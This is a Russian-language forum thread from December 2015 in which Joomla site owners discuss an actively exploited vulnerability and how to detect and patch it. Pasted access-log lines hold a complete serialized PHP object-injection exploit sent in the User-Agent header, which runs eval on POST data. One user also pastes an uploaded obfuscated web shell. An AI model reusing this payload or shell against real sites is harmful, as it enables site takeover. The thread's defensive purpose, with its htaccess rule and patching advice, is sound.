Критическая уязвимость в сайтах на Joomla

проанализировать access.log

сравнить все файлы с оригиналом

На одном запросе стоит код ответа 200. Это значит проникли?

да через апач

В стандартном хтассес джумлы нужно просто это дописать или где то заменить ?

RewriteCond %{HTTP_USER_AGENT} .*\{.* [NC]

RewriteRule .* - [F,L]

---------- Добавлено 16.12.2015 в 18:24 ----------

помогите срочно, куда это записать и вместо чего ?

на некоторых сайтах есть признаки типа такого

4.3.170.33 – – [12/Dec/2015:16:49:40 -0500] “GET /contact/ HTTP/1.1″ 403 5322 “http://google.com/” “}__test|O:21:\x22JDatabaseDriverMysqli\x22:3: ..

{s:2:\x22fc\x22;O:17:\x22JSimplepieFactory\x22:0: .. {}s:21:\x22\x5C0\x5C0\x5C0disconnectHandlers\x22;a:1:{i:0;a:2:{i:0;O:9:\x22SimplePie\x22:5:..

{s:8:\x22sanitize\x22;O:20:\x22JDatabaseDriverMysql\x22:0:{}s:8:\x22feed_url\x22;s:60:.

---------- Добавлено 16.12.2015 в 18:44 ----------

практически на все сайты в течении дня были такие запросы

195.154.56.44 - - [16/Dec/2015:04:30:48 +0200] "GET / HTTP/1.0" 301 316 "http://site.ru/" "}__test|O:21:\"JDatabaseDriverMysqli\":3:{s:2:\"fc\";O:17:\"JSimplepieFactory\":0:{}s:21:\"\\0\\0\\0disconnectHandlers\";a:1:{i:0;a:2:{i:0;O:9:\"SimplePie\":5:{s:8:\"sanitize\";O:20:\"JDatabaseDriverMysql\":0:{}s:8:\"feed_url\";s:60:\"eval(base64_decode($_POST[111]));JFactory::getConfig();exit;\";s:19:\"cache_name_function\";s:6:\"assert\";s:5:\"cache\";b:1;s:11:\"cache_class\";O:20:\"JDatabaseDriverMysql\":0:{}}i:1;s:4:\"init\";}}s:13:\"\\0\\0\\0connection\";b:1;}\xf0\x9d\x8c\x86"

207.244.70.35 - - [16/Dec/2015:04:31:05 +0200] "GET / HTTP/1.0" 200 44717 "http://site.ru/" "}__test|O:21:\"JDatabaseDriverMysqli\":3:{s:2:\"fc\";O:17:\"JSimplepieFactory\":0:{}s:21:\"\\0\\0\\0disconnectHandlers\";a:1:{i:0;a:2:{i:0;O:9:\"SimplePie\":5:{s:8:\"sanitize\";O:20:\"JDatabaseDriverMysql\":0:{}s:8:\"feed_url\";s:60:\"eval(base64_decode($_POST[111]));JFactory::getConfig();exit;\";s:19:\"cache_name_function\";s:6:\"assert\";s:5:\"cache\";b:1;s:11:\"cache_class\";O:20:\"JDatabaseDriverMysql\":0:{}}i:1;s:4:\"init\";}}s:13:\"\\0\\0\\0connection\";b:1;}\xf0\x9d\x8c\x86

Сайты уже взломаны как определить ?

и стоит сейчас в хтассес дописывать ?

Ну так просканировать же. Айболитом например. Или хотя бы глянуть на наличие новых файлов. Я, к примеру, вчера уже видел джумлу с залитым через эту дыру шеллом. Буквально на моих глазах залили в папку librares. Правда потом в течении пары часов больше ничего не делали (видимо сначала шеллы заливают, а потом уже полностью сайт загаживают 🤪)

Чтобы закрыть эту дыру, достаточно заменить один файл. Неужели это сложнее сделать, чем что-то дописывать? 😮

для старых сайтов с 1.5 версией непонятно откуда патчи брать

Есть на оффсайте, есть в моём блоге

можете скинуть ссылочку плиз на офф сайт, нужно для джумлы 1.5 и 2.5

если после этого запроса сначла 301 ответ, потом 200 значит взломали ?

и есть смысл сейчас прямо патчить, либо восстановить из бекапа и потом патчить ?

---------- Добавлено 16.12.2015 в 19:54 ----------

с вашего сайта просто заменить папку libraries или сам файл session.php ?

Менять надо сам файл.

Если взломали, то плохо.

Восстановаливайте из бэкапа, но как то сразу надо и пропатчить

залили на сайты вот это

<?php

if(isset($_POST['jml'])){($www = $_POST['jml']) && @preg_replace('/ad/e', '@' . str_rot13('riny') . '($www)', 'add');exit;}

что это значит, кто то может сказать ?

Куда именно? В какую директорию? Что в логах?

Буквально после "}__test|O:21:\"JDatabaseDriverMysqli\":3:{s:2:\"fc\";O:17:\.........., следующий запрос с этого же адреса идет GET /components/com_media/ajax.php. Так по крайней мере у меня.